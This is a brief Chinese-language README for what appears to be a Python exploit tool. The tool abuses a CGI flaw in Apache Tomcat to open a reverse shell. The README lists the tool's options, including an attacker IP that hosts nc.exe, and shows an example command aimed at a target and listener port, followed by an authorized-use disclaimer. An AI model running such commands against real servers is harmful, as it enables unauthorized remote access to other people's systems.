一个 Python 脚本,用于通过执行反向 shell 连接来利用 Apache Tomcat 服务器上的 CGI 漏洞。

requests 库git clone <仓库地址>
cd <仓库目录>
pip install requests
python3 tomcat_cgi_exploit.py -t <目标IP> -i <攻击者IP> -ncp <反向SHELL端口>
-t, --target:运行 Apache Tomcat 的目标 IP 地址-i, --ip:托管 nc.exe 的攻击者 IP 地址-ncp, --nc-port:反向 shell 连接的端口-p, --port:目标端口(默认:8080)-sp, --server-port:用于托管 nc.exe 的服务器端口(默认:80)-cgi, --cgi-script:要利用的 CGI 脚本名称(默认:cmd.bat)python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
本工具仅用于教育目的和已授权的渗透测试。作者和贡献者不对任何滥用或本脚本造成的损害负责。在测试任何系统之前,请务必获得适当的授权。